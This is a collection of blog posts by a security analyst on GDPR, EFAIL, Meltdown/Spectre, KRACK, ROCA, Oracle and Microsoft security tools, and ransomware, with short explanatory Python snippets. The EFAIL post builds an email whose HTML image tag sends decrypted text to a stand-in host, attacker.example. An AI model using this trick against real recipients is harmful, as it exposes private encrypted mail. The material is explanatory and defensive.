Blog posts by Alexei Balaganski
It’s May 25 today, and the world hasn’t ended. Looking back at the last several weeks before the GDPR deadline, I have an oddly familiar feeling. It seems that many companies have treated it as another “Year 2000 disaster” - a largely imaginary but highly publicized issue that everyone had to address before a set date, and which was then quickly forgotten because nothing really happened.
Unfortunately, applying the same logic to GDPR is the biggest mistake a company can make. First of all, obviously, you can only be sure that all your preparations actually worked once they are tested in court, and we all hope that happens to us as late as possible. Furthermore, GDPR compliance is not a one-time event; it’s a continuous process that will have to become an integral part of your business for years (along with other regulations that will inevitably follow). Most importantly, however, all the bad guys out there are definitely not planning to comply and will double their efforts in developing new ways to attack your infrastructure and steal your sensitive data.
In other words, it’s business as usual for cybersecurity specialists. You still need to keep up with the ever-changing cyberthreat landscape, react to new types of attacks, learn about the latest technologies and stay as agile and flexible as possible. The only difference is that the cost of your mistake will now be much higher. On the other hand, the chance that your management will give you a bigger budget for security products is also somewhat bigger, and you have to use this opportunity wisely.
As we all know, the cybersecurity market is booming and companies are spending billions on it, but the net effect of this increased spending seems to be negligible – the number of data breaches and ransomware attacks is still going up. Is it a sign that many companies still view cybersecurity as a kind of magic ritual, a cargo cult of sorts? Or is it caused by a major skills gap, as the world simply doesn’t have enough experts to battle cybercriminals efficiently?
It’s probably both, and the key underlying factor here is the simple fact that in the age of Digital Transformation, cybersecurity can no longer be a problem of your IT department alone. Every employee is now constantly exposed to security threats, and humans, not computers, are now the weakest link in any security architecture. Unless everyone is actively involved, there can be no security. Luckily, we already see awareness of this fact growing steadily among developers, for example. The whole notion of DevSecOps revolves around integrating security practices into all stages of the software development and operations cycle.
However, that is far from enough. As business people like your CFO, not administrators, become the most privileged users in your company, you have to completely rethink substantial parts of your security architecture to address the fact that a single forged email can do more harm to your business than the most sophisticated zero-day exploit. Remember, the victim is doing all the work here, so no firewall or antivirus will stop this kind of attack!
To sum it all up, a future-proof cybersecurity strategy in the “post-GDPR era” must, of course, be built upon a solid foundation of data protection and privacy by design. But that alone is not enough – only by constantly raising awareness of the newest cyberthreats among all employees and by gradually increasing the degree of intelligent automation of your daily security operations do you have a chance of staying compliant with the strictest regulations at all times.
Humans and robots fighting cybercrime together – what a time to be alive! :)
With mere days left till the dreaded General Data Protection Regulation comes into force, many companies, especially those not based in the EU, still haven’t quite figured out how to deal with it. As we have mentioned countless times, the upcoming GDPR will profoundly change the way companies collect, store and process the personal data of any EU resident. Both “personal data” and “processing” are defined very broadly, and processing is only considered legal if it meets a number of very strict criteria. Fines for non-compliance are massive – up to 20 million Euros or 4% of a company’s annual turnover, whichever is higher.
Needless to say, not many companies feel happy about the massive investments they’d need to make in their IT infrastructures, as well as the other costs (consulting, legal and even PR-related) of compliance. And while European businesses don’t really have any other option, quite a few companies based outside of the EU are considering pulling out of the European market completely. A number of them have even made their decision public, although we can safely assume that most would rather keep the matter quiet.
However, before you even start looking for similar solutions, consider one point: the GDPR protects EU data subjects’ privacy regardless of their geographic location. A German citizen staying in the US and using a US-based service is, at least in theory, supposed to have the same control over their PII as back home. And even without traveling, an IP blacklist can easily be circumvented using readily available tools like a VPN. Trust me, Germans know how to use them – until recently, the majority of YouTube videos were not available in Germany because of a copyright dispute, so a VPN was needed to enjoy “Gangnam Style” or any other musical hit of the time.
On the other hand, thinking that the EU intends to track every tiniest privacy violation worldwide and then drag every offender to court is ridiculous; just consider the huge resources European bureaucrats would need to put into a campaign of that scale. In reality, their first targets will undoubtedly be the likes of Facebook and Google – large companies whose business is built upon collecting and reselling their users’ personal data to third parties. So, unless your business is in the same market as Cambridge Analytica, you should probably reconsider the idea of blocking out European visitors – after all, you’d miss nearly 750 million potential customers from the world’s largest economy.
Finally, the biggest mistake many companies make is to think that GDPR’s sole purpose is to somehow make their lives more miserable and to punish them with unnecessary fines. However, like any other compliance regulation, GDPR is above all a comprehensive set of IT security, data protection and legal best practices. Complying with GDPR - even if you don’t plan to do business in the EU market - is thus a great exercise that can prepare your business for some of the most difficult challenges of the Digital Age. Maybe in the same sense as a volcano eruption is a great test of your running skills, but running exercises are still quite useful even if you do not live in Hawaii.
As we all know, there is no better way for a security researcher to start a new week than to learn about another massive security vulnerability (or two!) that beats all previous ones and will surely ruin the IT industry forever! Even though I’m busy packing my suitcase and getting ready to head to our European Identity and Cloud Conference that starts tomorrow in Munich, I simply cannot help but put my things aside for a moment and admire the latest one.
This time it’s about email encryption (or rather its untimely demise). According to this announcement from the EFF, a group of researchers from German and Belgian universities has discovered a set of vulnerabilities affecting users of S/MIME and PGP – the two most popular protocols for exchanging encrypted messages over email. In a chain of rather cryptic tweets, they announced that they would publish these vulnerabilities tomorrow and that there is no reliable fix for the problems they’ve discovered. Apparently, the only way to avoid leaking your encrypted emails (even ones sent in the past) to malicious third parties is to stop using these encryption tools completely.
Needless to say, this wasn’t the most elegant way to disclose such a serious vulnerability. Without concrete technical details, which we are promised not to see until tomorrow, pretty wild speculations are already making the rounds in the press. Have a look at this article in Süddeutsche Zeitung, for example: „a research team… managed to shatter one of the central building blocks of secure communication in the digital age“. What do we do now? Are we all doomed?!
Well, first of all, let’s not speculate until we get exact information about the exploits and the products that are affected and not yet fixed. However, we can try to make an educated guess based on the bits of information we already have. Apparently, the problem is not caused by a weakness in either protocol, but rather by the peculiar way modern email programs handle multipart mail messages (those are typically used for delivering HTML mails or messages with attachments). By carefully manipulating invisible parts of an encrypted message, an attacker may trick the recipient’s mail program into opening an external link and thus leaking the decrypted content. Since the attacker controls this URL, they can use it to exfiltrate the decrypted message or other sensitive data.
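Based on what is known so far, the message structure involved can be sketched with Python’s standard email library. To be clear, this is a toy illustration of the multipart trick, not a working exploit: the domain attacker.example and all content are made up, and a real attack depends on how a specific mail client renders the parts.

```python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Toy illustration (not a working exploit): the attacker wraps a captured
# encrypted body part between two HTML parts. If a vulnerable client
# decrypts the middle part and renders all parts as one HTML document,
# the unclosed <img> tag swallows the decrypted plaintext into a URL
# request to a server the attacker controls (attacker.example is made up).
msg = MIMEMultipart("mixed")
msg["Subject"] = "Re: quarterly report"

msg.attach(MIMEText('<img src="http://attacker.example/leak?x=', "html"))
msg.attach(MIMEText(
    "-----BEGIN PGP MESSAGE-----\n...captured ciphertext...\n"
    "-----END PGP MESSAGE-----", "plain"))
msg.attach(MIMEText('">', "html"))

print(msg.as_string())
```

Running this prints a three-part message; the point is simply that the attacker needs no cryptographic break at all, only the recipient’s own client doing the decryption and then fetching the image URL.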
How can you protect yourself from the exploit right now? Well, the most obvious solution is not to use HTML format for sending encrypted mails. Of course, the practicality of this method in real life is debatable – you cannot force all of your correspondents to switch to plain text, especially the malicious ones. The next suggestion is to stop using encryption tools that are known to be affected (some are listed in the EFF’s article) until they are fixed. The most radical method, obviously, is to stop using email for secret communications completely and switch to a more modern alternative.
Will this vulnerability fundamentally change the way we use encrypted email in general? I seriously doubt it. Back in 2017, it was discovered that for months, Microsoft Outlook had been sending all encrypted mails with both the encrypted and unencrypted forms of the original content included. Did anyone stop using S/MIME or decide to switch to PGP? Perhaps the researchers who discovered that bug should have used more drama!
However negatively I usually think about this kind of sensational journalism in IT, maybe it will have a certain positive effect if it makes more people take notice and update their tools promptly. Or maybe it will give software vendors an additional incentive to develop better, more reliable and convenient secure communication solutions.
Recently, Microsoft announced general availability of another addition to its cybersecurity portfolio: Azure Advanced Threat Protection (Azure ATP for short) – a cloud-based service for monitoring and protecting hybrid IT infrastructures against targeted cyberattacks and malicious insider activity.
The technology behind this service is actually not new. Microsoft acquired it back in 2014 with the purchase of Aorato, an Israel-based startup specializing in Active Directory security. Aorato’s behavior detection methodology, named Organizational Security Graph, enables non-intrusive collection of network traffic, event logs and other data sources in an enterprise network and then, using behavioral analysis and machine learning algorithms, detects suspicious activities, security issues and cyberattacks against corporate Active Directory servers.
Although this may sound like an overly specialized tool, in reality solutions like this can be a very useful addition to any company’s security infrastructure – after all, statistics show that the vast majority of security breaches leverage compromised credentials, and close monitoring of the heart of nearly every company’s identity management – the Active Directory servers – allows for quicker identification of both known malicious attacks and traces of unknown but suspicious activities. And since practically every cyberattack involves manipulating stolen credentials at some stage of the kill chain, identifying them early allows security experts to discover these attacks much sooner than the typical 99+ days.
Back in 2016, we reviewed Microsoft Advanced Threat Analytics (ATA), the first product Microsoft released with the Security Graph technology. KuppingerCole’s verdict at the time was that the product was easy to deploy, transparent and non-intrusive, with an innovative and intuitive user interface, yet powerful enough to identify a wide range of security issues, malicious attacks and suspicious activities in corporate networks. However, the product was only intended for on-premises deployment and provided very limited forensic and mitigation capabilities due to a lack of integration with other security tools.
Well, with the new solution, Microsoft has successfully addressed both of these challenges. Azure ATP, as is evident from its name, is a cloud-based service. Although you obviously still need to deploy sensors within your network to capture network traffic and other security events, the data is sent directly to the Azure cloud, and all the correlation magic happens there. This makes the product substantially more scalable and suitable even for the largest corporate networks. In addition, it can directly consume the latest threat intelligence data collected by Microsoft across its cloud infrastructure.
On top of that, Azure ATP integrates with Windows Defender ATP – Microsoft’s endpoint protection platform. If you’re using both platforms, you can seamlessly switch between them for additional forensic information or direct remediation of malware threats on managed endpoints. In fact, the company’s Advanced Threat Protection brand now also includes Office 365 ATP, which provides protection against malicious emails and URLs, as well as secures files in Office 365 applications.
With all three platforms combined, Microsoft can now offer seamless protection against malicious attacks across the most critical attack surfaces as a fully managed cloud-based solution.
When IT visionaries give presentations about the Digital Transformation, they usually talk about large enterprises with teams of experts working on exciting stuff like heterogeneous multi-cloud application architectures with blockchain-based identity assurance and real-time behavior analytics powered by deep learning (and many other marketing buzzwords). Of course, these companies can also afford to invest substantial money in building in-depth security infrastructures to protect their sensitive data.
Unfortunately, for every such company there are probably thousands of smaller ones, which have neither the budgets nor the expertise of their larger counterparts. This means that these companies not only cannot afford “enterprise-grade” security products, they are often not even aware that such products exist or, for that matter, what problems they are facing without them. And yet, from the compliance perspective, these companies are just as responsible for protecting their customers’ personal information (or other kinds of regulated digital data) as the big ones, and they face the same harsh punishments for GDPR violations.
One area where this is especially evident is database security. Databases are still the most widespread technology for storing business information across companies of all sizes. Modern enterprise relational databases are extremely sophisticated and complex products, requiring trained specialists for their setup and daily maintenance. The number of security risks a business-critical database is exposed to is surprisingly large, ranging from the sensitive data itself all the way down to the application stack, storage, network and hardware. This is especially true for popular database vendors like Oracle, whose products can be found in every market vertical.
Of course, Oracle itself can readily provide a full range of database security solutions for its databases, but needless to say, not every customer can afford to spend that much, not to mention having the necessary expertise to deploy and operate these tools. The recently announced Autonomous Database can solve many of those problems by completely taking management tasks away from DBAs, but it should be obvious that, at least in the short term, this service isn’t a solution for every possible use case, so on-premises Oracle databases are not going anywhere anytime soon.
And it is exactly for these that the company has recently (and without much publicity) released its Database Security Assessment Tool (DBSAT) – a freeware tool for assessing the security configuration of Oracle databases and for identifying sensitive data in them. The tool is a completely standalone command-line program that does not have any external dependencies and can be installed and run on any DB server in minutes to generate two types of reports.
The Database Security Assessment report provides a comprehensive overview of configuration parameters, identifying weaknesses, missing updates, improperly configured security technologies, excessive privileges and so on. For each discovered problem, the tool provides a short summary and risk score, as well as remediation suggestions and links to the appropriate documentation. I had a chance to see a sample report, and even with my quite limited DBA skills I was able to quickly identify the biggest risks and understand which concrete actions I’d need to take to mitigate them.
The Sensitive Data Assessment report provides a different view on the database instance, showing the schemas, tables and columns that contain various types of sensitive information. The tool supports over 50 types of such data out of the box (including PII, financial and healthcare for several languages), but users can define their own search patterns using regular expressions. Personally, I find this report somewhat less informative, although it does its job as expected. If only for executive reporting, it would be useful not just to show how many occurrences of sensitive data were found, but to provide an overview of the overall company posture to give the CEO a few meaningful numbers as KPIs.
Of course, being a standalone tool, DBSAT does not support any integration with other security assessment tools from Oracle, nor does it provide any means for mass deployment across hundreds of databases. What it does provide is the option to export the reports into formats like CSV or JSON, which can then be imported into third-party tools for further processing. Still, even in this rather simple form, the program helps a DBA quickly identify and mitigate the biggest security risks in their databases, potentially saving the company from a breach or a major compliance violation. And as we all know, these are going to become very expensive soon.
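That export option is what makes even a standalone tool scriptable: a few lines of Python can aggregate findings from many databases. Note that the JSON schema below (field names like "severity") is a hypothetical stand-in for illustration, not DBSAT’s documented format.

```python
import json
from collections import Counter

# Hypothetical excerpt of an exported findings report; the real DBSAT
# schema differs - this only shows the post-processing idea.
report_json = """
[
  {"finding": "Default passwords in use", "severity": "High"},
  {"finding": "Auditing not configured", "severity": "Medium"},
  {"finding": "Patch level outdated", "severity": "High"}
]
"""

findings = json.loads(report_json)
by_severity = Counter(f["severity"] for f in findings)

# A one-line executive summary per database instance:
print(", ".join(f"{sev}: {n}" for sev, n in by_severity.most_common()))
# High: 2, Medium: 1
```

Run against exports from hundreds of databases, this kind of aggregation yields exactly the overall-posture KPIs mentioned above.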
Perhaps my biggest disappointment with the tool, however, has nothing to do with its functionality. Just like other companies before it, Oracle does not seem very keen on letting the world know about tools like this. And what use is even the best security tool or feature if people do not know of its existence? Have a look at AWS, for example, where misconfigured permissions on S3 buckets have been behind a large number of embarrassing data leaks. And even though AWS now offers a number of measures to prevent them, we still keep reading about new personal data leaks every week.
Spreading the word and raising awareness about the security risks and free tools to mitigate them is, in my opinion, just as important as releasing those tools. So, I’m doing my part!
Looks like we IT people have gotten more New Year presents than expected for 2018! The year has barely started, but we already have two massive security problems on our hands, vulnerabilities that dwarf anything discovered previously, even the notorious Heartbleed bug or the KRACK weakness in Wi-Fi protocols. Discovered back in early 2017 by several independent groups of researchers, these vulnerabilities were understandably kept from the general public to give hardware and operating system vendors time to analyze their effects and develop countermeasures, and to prevent hackers from creating zero-day exploits.
Unfortunately, the number of patches recently made to the Linux kernel alone was enough to raise the suspicion of many security experts. This led to a wave of speculation about the possible reasons behind them: does it have something to do with the NSA? Will it make all computers in the world run 30% slower? Why is Intel’s CEO selling his stock? In the end, the researchers were forced to release their findings a week early just to put an end to the wild rumors. So, what is this all about, after all?
Technically speaking, neither Meltdown nor Spectre is caused by a bug or vulnerability in a specific product. Rather, both exploit the unforeseen side effects of speculative execution, a core feature present in most modern processors that is used to significantly improve performance. The idea behind speculative execution is actually quite simple: every time a processor must check a condition in order to decide which part of the code to run, instead of waiting until some data is loaded from memory (which may take hundreds of CPU cycles), it makes an educated guess and starts executing the next instructions immediately. If the guess later proves to be wrong, the processor simply discards those instructions and reverts its state to a previously saved checkpoint; if it was correct, the resulting performance gain can be significant. Processors have been designed this way for over 20 years, and the potential security implications of incorrect speculative execution were never considered important.
Well, not any more. Researchers have discovered multiple methods of exploiting the side effects of speculative execution that allow malicious programs to steal sensitive data they normally should not have access to. And since the root cause of the problem lies in the fundamental design of a wide range of modern Intel, AMD and ARM processors, nearly every system using those chips is affected, including desktops, laptops, servers, virtual machines and cloud services. There is also no way to detect or block attacks using these exploits with an antivirus or any other software.
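The mechanism described above can be sketched as a toy model. Real attacks measure cache timing on actual hardware; this Python sketch only models the bookkeeping of a Spectre-style bounds-check bypass, with all names and values invented for illustration.

```python
# Toy model of why speculative execution leaks: even when the CPU discards
# the results of a mispredicted branch, the cache lines it touched stay
# warm, and that difference is measurable from outside.

SECRET = b"K"          # byte the attacker must not read directly
public_data = b"AB"    # attacker may legally index only 0..1
memory = public_data + SECRET

cache = set()          # which "cache lines" are warm

def speculative_read(index, predicted_in_bounds=True):
    """Simulate a CPU whose bounds-check result arrives late, so it
    speculates past the check and performs the dependent load anyway."""
    in_bounds = index < len(public_data)
    if predicted_in_bounds:           # branch predictor says "in bounds"
        value = memory[index]         # executed speculatively
        cache.add(value)              # side effect survives the rollback
    if not in_bounds:
        return None                   # architectural result is discarded
    return memory[index]

# Out-of-bounds read: the architectural result is rolled back...
assert speculative_read(2) is None
# ...but the secret byte's cache line is now warm, leaking its value.
print([chr(b) for b in cache])  # ['K']
```

On real hardware the attacker recovers the leaked byte by timing memory accesses, which is why no software-level scanner can see the attack happening.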
The only way to fully mitigate all variants of the Spectre exploit is to modify every program explicitly to disable speculative execution in sensitive places. There is some consolation in the fact that exploiting this vulnerability is quite complicated and there is no way to affect the operating system kernel this way. This cannot be said about the Meltdown vulnerability, however.
Apparently, Intel processors take so many liberties when applying performance optimizations to the executed code that the same root cause gives hackers access to arbitrary system memory locations, rendering (“melting”) all memory isolation features in modern operating systems completely useless. When running on an Intel processor, malicious code can leak sensitive data from any process or the OS kernel. In a virtualized environment, a guest process can leak data from the host operating system. Needless to say, this scenario is especially catastrophic for cloud service providers, where data sovereignty is not just a technical requirement, but a key legal and compliance foundation of their business model.
Luckily, there is a way to mitigate the Meltdown vulnerability completely at the operating system level, and that is exactly what Microsoft, Apple and the Linux kernel developers have been working on in recent months. Unfortunately, enforcing separation between kernel and user space memory also means undoing performance optimizations that processors and OS kernels rely on to make switching between different execution modes quicker. According to independent tests, depending on the application, these losses may be anywhere between 5% and 30%. Again, this may be unnoticeable to average office users, but it can be dramatic for cloud environments, where computing resources are billed by execution time. How would you like to have your monthly bill suddenly increased by 30% for… nothing, really?
Unfortunately, there is no way around this. The first and most important recommendation is the usual one: keep your systems up-to-date with the latest patches. Update your browsers. Update your development tools. Check the advisories published by your cloud service provider. Plan your mitigation measures strategically.
And keep a cool head – conspiracy theories are fun, but not productive in any way. And by the way: Intel officially states that their CEO selling stocks in October has nothing to do with this vulnerability.
Recently, I attended Oracle OpenWorld in San Francisco. For five days, the company spared no expense to inform, educate and (last but not least) entertain its customers and partners as well as developers, journalists, industry analysts and other visitors – in total, a crowd of over 50 thousand. As a person somewhat involved in organizing IT conferences (on a much smaller scale, of course), I could not help but stand in awe, thinking about all the challenges the organizers of such an event had to overcome to make it successful and safe.
More important, however, was the almost unexpected thematic twist that dominated the whole conference. As I was preparing for the event, browsing the agenda and the list of exhibitors, I found way too many topics and products quite outside my area of coverage. Although I do have some database administrator (DBA) experience, my current interests lie squarely within the realm of cybersecurity, and I wasn’t expecting to hear a lot about it. Well, I could not have been more wrong! In the end, cybersecurity was definitely one of the most prominent topics, starting right with Larry Ellison’s opening keynote.
The Autonomous Database, the world’s first database, according to Oracle, that comes with fully automated management, was the first and the biggest announcement. Built upon the latest Oracle Database 18c, this solution promises to completely eliminate human labor and hence human error thanks to complete automation powered by machine learning. This includes automated upgrades and patches, disaster recovery, performance tuning and more. In fact, an autonomous database does not have any controls available for a human administrator – it just works™. Of course, it does not replace all the functions of a DBA: a database specialist can now focus on more interesting, business-related aspects of his job and leave the plumbing maintenance to a machine.
The offer comes with a unique SLA that guarantees 99.995% availability without any exceptions. And thanks to more elastic scalability and optimized performance, “it’s cheaper than AWS,” as we were told at least a dozen times during the keynote. For me, however, the security implications of this offer are the most important part. Since the database is no longer directly accessible to administrators, this not only dramatically improves its stability and resilience against human error, but also substantially reduces the potential cyberattack surface and simplifies compliance with data protection regulations. This does not fully eliminate the need for database security solutions, but it at least simplifies the task quite a bit without any additional costs.
Needless to say, this announcement has caused quite a stir among database professionals: does it mean that a DBA is now completely replaced by an AI? Should thousands of IT specialists around the world fear for their jobs? Well, the reality is a bit more complicated: the Autonomous Database is not really a product, but a managed service combining the newest improvements in the latest Oracle Database release with the decade-long evolution of various automation technologies, running on the next generation of Oracle Exadata hardware platform supported by the expertise of Oracle’s leading engineers. In short, you can only get all the benefits of this new solution when you become an Oracle Cloud customer.
This is, of course, a logical continuation of Oracle’s ongoing struggle to position itself as a cloud company. Although the company already has an impressive portfolio of cloud-based enterprise applications and continues to invest a lot in expanding its SaaS footprint, when it comes to PaaS and IaaS, Oracle still cannot really compete with rivals that started in this business years earlier. So, instead of trying to beat competitors on their traditional playing fields, Oracle is now focusing on offering unique and innovative solutions that other cloud service providers simply do not have (and in the database market probably never will).
Another security-related announcement was the unveiling of Oracle Security Monitoring and Analytics – a cloud-based solution that enables detection, investigation and remediation of various security threats across on-premises and cloud assets. Built upon the Oracle Management Cloud platform, this new service also focuses on solving the skills gap problem in cybersecurity by reducing the administration burden and improving the efficiency of cybersecurity analysts.
Among other notable announcements are various services based on applied AI technologies like intelligent conversation bots and the newly launched enterprise-focused Blockchain Cloud Service based on the popular Hyperledger Fabric project. These offerings, combined with the latest rapid application development tools unveiled during the event as well, will certainly make the Oracle Cloud Platform more attractive not just for existing Oracle customers, but for newcomers of all sizes – from small startups with innovative ideas to large enterprises struggling to make their transition to the cloud as smooth as possible.
For anyone working in IT security, this week surely did not start well. Not one, but two major cryptography-related vulnerabilities have been disclosed, and each of them is at least as massive in scale and potential consequences as the notorious Heartbleed incident from 2014.
First, Belgian researcher Mathy Vanhoef of KU Leuven published the details of several critical weaknesses discovered in WPA2 – the de facto standard protocol used for securing modern Wi-Fi networks. By exploiting these weaknesses, an attacker can launch so-called key reinstallation attacks (hence the name KRACK, and we’ve discussed the importance of catchy names for vulnerabilities before) and eventually decrypt any sensitive data transmitted over a supposedly secured wireless channel.
As opposed to Heartbleed, however, the vulnerability is not found in a particular library or product – it’s caused by an ambiguity in the definition of the WPA2 protocol itself, so any operating system or library that implements it correctly is still vulnerable. Thus, all desktop and mobile operating systems are affected by this attack, as well as numerous embedded and IoT devices with built-in Wi-Fi capabilities. Somewhat luckily, this protocol weakness can be fixed in a backwards-compatible manner, so we do not have to urgently switch to WPA3 (and by no means should you switch to WEP or any other even less secure connection method in your wireless network). However, there is no way to mitigate the problem without patching each client device. Changing the Wi-Fi password, for example, won’t help.
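The cryptographic core of the problem, namely why a key reinstallation (which resets the nonce and thus replays the same keystream) is fatal, can be shown in a few lines of Python. The 16-byte random keystream below simply stands in for the WPA2 cipher output; everything here is an illustrative simplification, not the actual KRACK handshake manipulation.

```python
import os

def xor(a, b):
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))

keystream = os.urandom(16)  # stands in for the cipher's per-nonce output
packet1 = b"user=alice&pw=hi"      # first packet (16 bytes)
packet2 = b"GET /index.html "      # second packet, SAME reinstalled nonce

c1 = xor(packet1, keystream)
c2 = xor(packet2, keystream)

# The attacker sees only c1 and c2, yet XORing them cancels the keystream
# entirely - without the attacker ever learning the key:
assert xor(c1, c2) == xor(packet1, packet2)

# Knowing (or guessing) one plaintext then reveals the other:
recovered = xor(xor(c1, c2), packet2)
print(recovered)  # b'user=alice&pw=hi'
```

This is exactly why patching clients is mandatory: the key itself is never broken, so changing the Wi-Fi password does nothing against keystream reuse.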
Of course, quite a few vendors have already released updates (including Microsoft), but how long will it take for everyone to apply them? And what about the huge numbers of legacy products that will never be patched? The only way to secure them properly is to disable Wi-Fi and basically repurpose them as expensive paperweights. For desktop and mobile users, using HTTPS-only websites or encrypted VPN tunnels for accessing sensitive resources is recommended, just as for any other untrusted network, wireless or not. In general, one should slowly get used to the notion of treating every network as untrusted, even one’s own home Wi-Fi.
The second vulnerability revealed just recently is of a different nature, but is already classified as even more devastating by many experts. The ROCA (Return of Coppersmith’s Attack) vulnerability is an implementation flaw discovered by an international team of British, Czech and Italian researchers in a cryptographic library used in security chips produced by Infineon Technologies. This flaw essentially means that RSA keys generated by these chips are not cryptographically strong and are much easier to crack.
In theory, this problem should not be as widespread as the KRACK vulnerability, but in reality it affects numerous security products from vendors such as Microsoft, Google, HP and Lenovo, and existing RSA keys dating back as far as 2012 can be vulnerable. And since public key cryptography is so widely used in IT – from network encryption to code signing to digital signatures in eGovernment projects – this opens up a broad range of potential exploits: spreading malware, performing identity theft or bypassing Trusted Platform Modules to run malicious code in secure environments.
What can we do to minimize the damage from this vulnerability? Again, it is first and foremost about checking for available security updates and applying them in a timely manner. Secondly, all potentially affected keys must be replaced (and nobody should be using 1024-bit RSA keys in 2017 anyway).
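Identifying the affected keys is made easier by a quirk of the flaw itself: the researchers published a fast fingerprint test that needs only the public modulus. Below is a simplified sketch of that idea. Primes generated by the flawed library have the form p = k·M + (65537^a mod M), so the modulus N = p·q is always a power of 65537 modulo every small prime dividing M. The prime list here is a shortened, illustrative subset of the one used by the real detector, so this sketch is for intuition only, not a production checker.

```python
# Simplified ROCA fingerprint test: a modulus that is a power of 65537
# modulo every small prime below is almost certainly from the flawed
# Infineon key generator; a normal RSA modulus fails the test for at
# least one of the primes with overwhelming probability.
SMALL_PRIMES = [11, 13, 17, 19, 37, 53, 61, 71, 73, 79,
                97, 103, 107, 109, 127, 151, 157]

def powers_of_65537(r):
    """The multiplicative subgroup generated by 65537 modulo r."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * 65537) % r
    return seen

def looks_like_roca(n):
    """True if n leaves the telltale Infineon trace modulo every small prime."""
    return all(n % r in powers_of_65537(r) for r in SMALL_PRIMES)
```

In practice one would run the vendors' published detection tools against certificate stores, TPMs and smartcards rather than roll one's own, but the check above shows why detection is cheap: it never needs the private key.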
And, of course, we always have to be ready for new announcements. The week has only just begun, after all!
I’ve been working in IT my whole life, and since I joined KuppingerCole over ten years ago, cybersecurity has been my job. Needless to say, I like my job: even though we industry analysts are not directly involved in forensic investigations or cyberthreat mitigation, staying up to date with the latest technological developments and sharing our expertise with both end users and security vendors is our daily life, which is challenging and exciting at the same time.
However, occasionally I have doubts about my career choice. Does anything I do even matter? The cybersecurity market is booming, predicted to reach nearly 250 billion USD within the next five years. But do we notice any downward trend in the number of security breaches or in the financial losses due to cyberattacks? Not really…
The last time I had these thoughts was back in May, after the notorious WannaCry incident: just as hundreds of top experts were discussing the most highbrow cybersecurity problems at our European Identity and Cloud Conference, a primitive piece of malware exploiting a long-fixed problem in the Windows operating system disrupted hundreds of thousands of computers around the world, affecting organizations from public hospitals to international telecom providers. How could this even happen? All right, those poor underfunded and understaffed British hospitals at least have a (still questionable) excuse for failing to maintain the most basic cybersecurity hygiene in their IT departments. But what excuse do large enterprises have for letting their users open phishing emails and for not keeping proper backups of their servers?
“But users do not care about their security or privacy,” people say. This couldn’t be further from the truth! People care very much about not being killed, so they arm themselves with guns. People care about their finances, so they do not keep their money under mattresses. And people surely care about their privacy, so they buy curtains and lock their doors. However, many people still do not realize that having an antivirus on their mobile phone is just as important for their financial stability – and sometimes even physical safety – as having a gun on their night table. And even those who are aware of that are often sold security products as a kind of magical amulet that is supposed to solve their problems without any effort. But should users really be blamed for that?
With enterprises, the situation is often even worse. Apparently, a substantial percentage of the security products purchased by companies never gets deployed at all. And more often than not, even those that do get deployed are actively sabotaged by users who see them as a nuisance hindering their business productivity. Add the “shadow IT” problem into the mix, and you’ll realize that many companies spending millions on cybersecurity are not really getting any substantial return on their investment. This is a classic example of a cargo cult. Sometimes, after reading about another large-scale security breach, I cannot completely suppress the mental image of a firewall made out of a cardboard box, or of a wooden backup appliance not connected to anything.
However, the reason for today’s rant is somewhat different and, in my opinion, even more troubling. While reading the documentation for a security product from a reputable vendor, I realized that it uses an external MySQL database to store its configuration. That got me thinking: a security product is sold with the promise of adding a layer of protection around an existing business application with known vulnerabilities. Yet this security product itself relies on another application with known vulnerabilities (MySQL isn’t exactly renowned for its security) to fulfill its basic functions. Is the resulting architecture even a tiny bit more secure? Not at all – due to the added complexity, it is in fact even more open to malicious attacks.
Unfortunately, this approach to secure software design is very common. The notorious Heartbleed vulnerability in the OpenSSL cryptographic library affected millions of systems around the world back in 2014, and three years later at least 200,000 of them still have not been patched. Of course, software vendors have their reasons for not investing in the security of their products: like any other business, they are struggling to bring their products to market as quickly as possible, and often they have neither the budget nor enough qualified specialists to design properly secured ones.
Nowadays, this problem is especially evident in consumer IoT products, which definitely deserve a separate blog post. However, security vendors that fail to make their own products sufficiently secure pose an even greater danger: as I mentioned earlier, for many individuals and organizations, a cybersecurity product is the modern equivalent of a safe. Or an armored car. Or an insulin pump. How can we trust a security product that is in fact about as reliable as a safe with plywood walls?
Well, if you’ve read my past blog posts, you probably know that I’m a strong proponent of government regulation of cybersecurity. I know this idea isn’t exactly popular among software vendors, but is there really a viable alternative? After all, gunsmiths and medical equipment manufacturers have been under strict government control for ages, and even security guards and private investigators must obtain licenses first. Why not security vendors? For modern digital businesses, the reliability of cybersecurity products is at least as important as the pick resistance of their door locks.
Unfortunately, this kind of government regulation probably isn’t going to happen anytime soon, so companies looking for security solutions are still stuck with the “caveat emptor” principle. Without enough in-house experience to judge whether a particular product can really deliver its declared functionality, one should, of course, turn to an independent third party for qualified advice. For example, to an analyst house like us :)
However, the next most useful thing to look for is certification against government or industry standards. For example, when choosing an encryption solution, it is wise to look for FIPS 140-2 certification at Level 2 or higher. There are corresponding security certifications for cloud service providers, financial institutions, industrial networks and so on.
In any case, do not take any vendor’s claims for granted. Ask for details about the architecture of their products, which security standards they implement, and whether they rely on open source libraries or third-party products. The more pressure you put on vendors about secure design, the higher the chances that in the future they will see security by design as their unique selling proposition rather than a waste of resources. And as always, when you don’t know where to start, just ask an expert!
Just as we returned from our annual European Identity and Cloud Conference, where we spent four days discussing cybersecurity, identity management and privacy protection with top experts from around the world, we were faced with the news from Great Britain, where the latest large-scale ransomware attack had nearly shut down IT systems in at least 16 hospitals. Medical workers were completely locked out of their computers. Patient records, test results and blood banks were no longer available. Critical patients were rushed to other hospitals for emergency surgery, while doctors had to switch back to pen and paper to carry on with their duties.
How could all this even happen? Sure, the media often present ransomware as the diabolically complex work of elite hacker groups, but in reality it is one of the least technologically advanced kinds of malware, barely more sophisticated than the proverbial Albanian virus. Typically, ransomware is spread via massive phishing campaigns that lure unsuspecting users into opening an attachment, letting the malware exploit a known vulnerability to infect their computers. Finally, the ransomware holds the victim’s computer hostage by encrypting important files or locking access to the whole system, demanding a payment to restore it.
This kind of malware is nothing new – the first prototype was developed over 20 years ago – but only recently, as the number of computers connected to the Internet has grown exponentially along with the availability of online payment services, has it become a profitable business for cybercriminals. After all, there is no need to spend weeks planning a covert targeted attack or developing evasion technologies – one can simply use readily available spam networks and vulnerability exploits to start collecting bitcoins, or even iTunes gift cards, from poor home users mourning the loss of their vacation photos.
